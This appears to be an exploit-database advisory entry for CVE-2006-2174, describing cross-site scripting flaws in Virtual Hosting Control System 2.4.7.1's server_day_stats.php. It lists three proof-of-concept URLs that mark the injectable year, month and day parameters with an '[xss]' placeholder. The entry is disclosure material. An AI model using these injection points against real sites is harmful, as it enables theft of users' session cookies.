Virtual Hosting Control System 2.4.7.1 - 'Server_day_stats.php' Multiple Cross-Site Scripting Vulnerabilities

Author: O.U.T.L.A.W
type: webapps
platform: php
port: 
date_added: 2006-05-02  
date_updated: 2013-08-23  
verified: 1  
codes: CVE-2006-2174;OSVDB-25219  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 27799.txt  
source: https://www.securityfocus.com/bid/17790/info

Virtual Hosting Control System is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/admin/server_day_stats.php?year=2006&month=05&day=2[xss]
http://www.example.com/admin/server_day_stats.php?year=2006&month=05[xss]&day=2
http://www.example.com/admin/server_day_stats.php?year=2006[xss]&month=05&day=2